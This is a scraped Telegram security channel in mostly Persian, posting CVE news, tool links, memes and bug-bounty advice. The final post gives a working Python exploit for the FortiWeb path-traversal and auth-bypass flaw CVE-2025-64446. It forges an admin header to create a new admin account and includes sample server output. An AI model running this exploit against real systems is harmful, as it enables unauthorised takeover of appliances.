RadvanSec – Telegram
RadvanSec
988 subscribers
180 photos
27 videos
142 files
593 links
"Security is Just an Illusion"
" امنیت فقط یک توهم است "

RadvanSec.com

Youtube , Instagram : @RadvanSec
Download Telegram
🚨 هکرها با یک تصویر، سامسونگ را هک کردند ZeroClick! کنترل کامل دستگاه!
یک حملهٔ سایبری جدید به نام LANDFAIL (CVE-2025-21042) کشف شده که دستگاه‌های Samsung Galaxy S22، S23، S24 و سری Z را که از اندروید 13 تا 15 استفاده می‌کنند، هدف قرار می‌دهد.
هکرها از یک آسیب‌پذیری Zero-Day سوء استفاده کرده‌اند که از طریق یک تصویر مخرب در واتس‌اپ امکان دسترسی از راه دور بدون هیچ‌گونه تعامل کاربر را فراهم می‌کند!
سامسونگ این مشکل را در به‌روزرسانی امنیتی آوریل 2025 برطرف کرده، اما میلیون‌ها کاربر ممکن است در صورت عدم به‌روزرسانی همچنان در معرض خطر باشند

⭐️ @RadvanSec
🔥5👍1
Forwarded from GO-TO CVE
👍3🔥1👏1
Forwarded from Tajan Security
وقتی بابام وارد اتاق میشه
همون لحظه FFUF 😂
🤣141😁1
Sin0x001
وقتی بابام وارد اتاق میشه همون لحظه FFUF 😂
اینارو خود ISP میندازه
👍4👌31
نوع تفکر شما در این زمینه خیلی مهمه هرکس یک رویکردی در این زمینه داره و بنظر من برای هرشخص باید متناسب شرایط و طرز فکر و سطح دانشی که داره متودولوژیش مشخص بشه کلا سعی کنید به هرچیزی توی زندگی از زاویه درست نگاه کنید حتی به مشکلات اینطوری ۵۰ درصد مسائل حل میشن…
5👏2👌1
CVE-2025-60710

LPE в \Microsoft\Windows\WindowsAI\Recall\PolicyConfiguration scheduled task.

POC

⭐️ @RadvanSec
2👍1🎅1
Forwarded from znuqv
git_secret.go
5.1 KB
3👍1
Forwarded from znuqv
https://github.com/mahdifn13/test2 این گیت هم میتونید تست کنید
3👍1
Forwarded from GO-TO CVE (| | Sharo K h | |)
Sin0x001
git_secret.go
یه ابزار برای دانلود کردن فایل های که قبلا از توی ریپو یه گیتهاب حذف شده
3👍1
یه هکر اینجوری از داون شدن کلادفلیر استفاده میکنه

https://www.instagram.com/reel/DRMy7riDYbp/?igsh=MWI1ZmpwdXk3Y256Zw==
7👍1🤣1
Forwarded from RedTeamAPT
سلام و وقت بخیر به همه‌ی همراهان عزیز 🌹
به دلیل ریپورت شدن کانال قبلی @RedTeamApt از این پس فعالیت ما در کانال جدید ادامه خواهد داشت.

🔹 آدرس کانال جدید:
@RedTeamApt1

🔹 گروه جدید:
@RedTeamGP

ممنون از همراهی و حمایت همیشگی شما 🙏
3🙏1
5G_Bit_Flipping_Attack.pdf
2.9 MB
"Bit-Flipping Attack Exploration and Countermeasure in 5G Network", Nov. 2025.
Repo

@Radvansec
6
Forwarded from KALI
ویندوز یه گاف گنده داده تو بخش گرافیکش؛ همون GDI که مسئول نشون دادن عکس و ایناست. یه سری فایل خاص مثل EMF / EMF+ وقتی باز می‌شن، ویندوز قشنگ قاطی می‌کنه چون یه جای کدش درست چک نکرده چی داره می‌خوره.
نتیجه؟
طرف فقط کافیه یه فایل تصویری عجیب برات بفرسته، تو هم باز کنی، و همون لحظه ویندوز می‌تونه کرش کنه، هنگ کنه، اطلاعات نشون بده جایی که نباید، یا بدتر — زمینه برای اجرای کد فراهم بشه. خلاصه یه خرابکاری تمیز.
مایکروسافت هم دید اوضاع داغونه، سریع یه پچ امنیتی داده تا این باگ رو ببنده.
اگه ویندوزت آپدیته، تقریباً خیالت راحت باشه.
اگه نه؟ خب دیگه… مثل اینه که در خونه رو باز گذاشته باشی و بگی خدا بزرگه 😅



@kali_signal
3👍2
#tools
#OSINT
#Offensive_security
POC : OSINT with LLM
https://github.com/mouna23/OSINT-with-LLM
// This repository demonstrates domain, IP, and email reconnaissance with LLM-powered security reporting

See also:
]-> RAG OSINT Tool
]-> LLM OSINT PoC Tool
]-> OSINT LLM Collector and Analyser
]-> AI-powered subdomain enumeration
tool with local LLM analysis via Ollama


@Radvansec
5👍2
سلام بچه ها امیدوارم خوب باشید؛
لایو امروز با بچه ها بررسی کردیم که حتی اگر قراره اتومیشنی داشته باشید باید به بهترین شکل ممکن پیاده سازی بشه با کمترین میس ممکن و بالاترین بازدهی البته هیچوقت آسیب پذیری رو صد درصد بعهده ابزار نندازید . اینکار شدیدا اشتباه هست .
تاجایی باید پیش برید که یک قدم تا کشف آسیب پذیری فاصله داشته باشید و ادامه کار کاملا منوال باید باشه
شما باید حدااقل بتونید روزی ۵ آسیب پذیری ولید ازش گزارش کنید البته رویکردی که خود اتومیشن داره باید درست باشه و پیشنهاد این هست که VPS های متعدد داشته باشید که هرکدوم رویکرد مناسب داشته
باشن تا بتونید آسیب پذیری های متنوعی ازش گزارش کنید

نکته خیلی مهم : تمرکز روی یک آسیب پذیری خاص و نادیده گرفتن مابقی = سم (کار اشتباه)

نکته دوم :‌ با AI ترکیب کنید فارغ از نتیجه ای که داره روند کار خیلی لذت بخش براتون خواهد بود 😁

⭐️ @RadvanSec
🔥8👏1
RadvanSec
سلام بچه ها امیدوارم خوب باشید؛ لایو امروز با بچه ها بررسی کردیم که حتی اگر قراره اتومیشنی داشته باشید باید به بهترین شکل ممکن پیاده سازی بشه با کمترین میس ممکن و بالاترین بازدهی البته هیچوقت آسیب پذیری رو صد درصد بعهده ابزار نندازید . اینکار شدیدا اشتباه…
سلام دوستان لایو دوره خصوصی بوده و لایو پابلیک رسمی کانال نبوده اگر دوست دارید ری اکشن بدید یک لایو پابلیک بریم و کامل AI + Security و agent هایی که خودتون میتونید بسازید رو باهم درموردش صحبت کنیم
👍25👎1🔥1
Forwarded from SecCode (Meisam Monsef)
شهادت حضرت فاطمه زهرا (س) تسلیت باد
@SecCode
💔206👎5
DomLoggerpp by @kevin_mizu is a simple web extension that helps you identify JavaScript DOM sinks that could lead to DOM-based vulnerabilities (such as XSS)! 😎

Check it out! 👇
https://github.com/kevin-mizu/domloggerpp

@Radvansec
4👍1
CVE-2025-64446 FortiWeb Unauthenticated RCE via Path Traversal and CGI Auth Bypass

So, based on THIS, you can get something like this:


import base64, json, subprocess
header = base64.b64encode(json.dumps({
"username": "admin",
"profname": "prof_admin",
"vdom": "root",
"loginname": "admin"
}).encode()).decode()

payload = json.dumps({
"data": {
"q_type": 1,
"name": "note2",
"access-profile": "prof_admin",
"password": "note2",
"comment": "automated RCE"
}
})

cmd = [
"curl", "--path-as-is", "-sk",
"-H", f"CGIINFO: {header}",
"-H", "Content-Type: application/json",
"--data", payload,
"https://localhost:38443/api/v2.0/cmdb/system/admin%3f/../../../cgi-bin/fwbcgi"
]
print(subprocess.run(cmd, capture_output=True, text=True).stdout)
PY

Output from the box:

{ "results": { "name": "note2", "access-profile": "prof_admin", ... } }


⭐️ @RadvanSec
3👍2